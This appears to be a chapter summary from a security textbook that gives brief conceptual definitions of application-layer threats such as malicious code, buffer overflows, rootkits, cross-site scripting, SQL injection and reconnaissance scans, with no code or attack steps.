Summary


               Applications developers have a lot to worry about! As hackers become
               more sophisticated in their tools and techniques, the Application layer
               is increasingly becoming the focus of their attacks due to its

               complexity and multiple points of vulnerability.

               Malicious code, including viruses, worms, Trojan horses, and logic
               bombs, exploits vulnerabilities in applications and operating systems
               or uses social engineering to infect systems and gain access to their
               resources and confidential information.

               Applications themselves also may contain a number of vulnerabilities.

               Buffer overflow attacks exploit code that lacks proper input validation
               to affect the contents of a system’s memory. Back doors provide
               former developers and malicious code authors with the ability to
               bypass normal security mechanisms. Rootkits provide attackers with
               an easy way to conduct escalation-of-privilege attacks.

               Many applications are moving to the web, creating a new level of
               exposure and vulnerability. Cross-site scripting attacks allow hackers

               to trick users into providing sensitive information to unsecure sites.
               SQL injection attacks allow the bypassing of application controls to
               directly access and manipulate the underlying database.

               Reconnaissance tools provide attackers with automated tools they can
               use to identify vulnerable systems that may be attacked at a later date.
               IP probes, port scans, and vulnerability scans are all automated ways
               to detect weak points in an organization’s security controls.

               Masquerading attacks use stealth techniques to allow the
               impersonation of users and systems.